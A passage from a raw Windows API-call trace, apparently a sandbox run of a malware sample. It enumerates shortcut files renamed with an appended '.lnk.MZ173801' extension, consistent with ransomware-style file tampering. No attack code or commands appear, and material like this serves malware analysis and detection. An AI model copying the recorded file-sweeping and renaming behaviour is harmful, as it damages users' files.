lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead127bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xead127bc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa341696b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Q2PT-p_KEzetPwQd hO2.lnk.MZ173801", cAlternateFileName="Q2PT-P~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0328e9, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9c0328e9, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa343c998, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x539, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qeFEt94 ZkESq80bTrZv.ots.lnk.MZ173801", cAlternateFileName="QEFET9~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744ebc9f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x744ebc9f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa343c998, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x297, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qMCV4VrTY-vx5.lnk.MZ173801", cAlternateFileName="QMCV4V~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b98dc3, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x88b98dc3, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3783ca8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="QWOw3VER.lnk.MZ173801", cAlternateFileName="QWOW3V~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3b904a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec3b904a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa37aa10a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rAI6kR Z24Gt07MNyb.lnk.MZ173801", cAlternateFileName="RAI6KR~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb223935, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb223935, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa37aa10a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rGR73UL0vv 5tipQ0.lnk.MZ173801", cAlternateFileName="RGR73U~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea579204, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea579204, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa37aa10a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RHvCNbn.lnk.MZ173801", cAlternateFileName="RHVCNB~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x763955ce, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x763955ce, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa37d013b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RLrwCvmuE.lnk.MZ173801", cAlternateFileName="RLRWCV~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cae5f4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x971b469b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3af1296, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x304, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Roaming.lnk.MZ173801", cAlternateFileName="ROAMIN~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743948f8, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x743948f8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3af1296, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x51f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rUWxi6pNUN.lnk.MZ173801", cAlternateFileName="RUWXI6~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb0cc211, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb0cc211, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa3af1296, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="s1HnMB.lnk.MZ173801", cAlternateFileName="S1HNMB~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754b773c, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x754b773c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3b1762a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2a1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sCm_S8YjQxWQT08.lnk.MZ173801", cAlternateFileName="SCM_S8~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaeb64ea, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeaeb64ea, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa3b1762a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="SFUO7aG.lnk.MZ173801", cAlternateFileName="SFUO7A~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e0f76d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x99e0f76d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3b3d835, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sHCpH11jen-XYoy Od_.lnk.MZ173801", cAlternateFileName="SHCPH1~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x715651d6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x715651d6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3b3d835, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sNSbJ9-I2i0PpN.lnk.MZ173801", cAlternateFileName="SNSBJ9~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9b0abca, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb249ca7, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa3b3d835, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x347, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="suu6d.lnk.MZ173801", cAlternateFileName="SUU6DL~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76347411, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76347411, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3ddf833, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="T1F3rLNHQkV.lnk.MZ173801", cAlternateFileName="T1F3RL~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae69f23, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeae69f23, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa3ddf833, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3ef, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="T4uSfA p9yNIyW.lnk.MZ173801", cAlternateFileName="T4USFA~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec1c8e21, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec1c8e21, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa3e05b91, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Tdqlc5SA.lnk.MZ173801", cAlternateFileName="TDQLC5~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.414] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.414] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9bc9921, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9bc9921, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa3e05b91, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="torEQ-P8Pc0pag.flv.lnk.MZ173801", cAlternateFileName="TOREQ-~1.MZ1")) returned 1 [0113.414] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x742d5d25, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x742d5d25, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3e2bd1e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="TrIgUDcr5i55m8wcE.lnk.MZ173801", cAlternateFileName="TRIGUD~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9ae4846, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9ae4846, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa3e2bd1e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="twHBtCvhRR2G5.lnk.MZ173801", cAlternateFileName="TWHBTC~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7db28253, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7db28253, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3e2bd1e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x28d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="txD8odKDry6.lnk.MZ173801", cAlternateFileName="TXD8OD~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76520647, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76520647, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa40c9148, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a2, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="tXqq.lnk.MZ173801", cAlternateFileName="TXQQLN~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea71cc0e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac2dbb0, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa40c9148, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uO40eItURrDuO.lnk.MZ173801", cAlternateFileName="UO40EI~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3466b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x8419b0d7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa40ef533, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x433, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uP0XF1kok-teK_dZt2-3.lnk.MZ173801", cAlternateFileName="UP0XF1~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762a000e, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x762a000e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa40ef533, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x495, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="v4vV8.lnk.MZ173801", cAlternateFileName="V4VV8L~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c69ae59, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9c69ae59, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa4115711, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Vh7qZ.lnk.MZ173801", cAlternateFileName="VH7QZL~1.MZ1")) returned 1 [0113.415] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.415] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.415] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea126b1b, ftCreationTime.dwHighDateTime=0x1d5f12a, 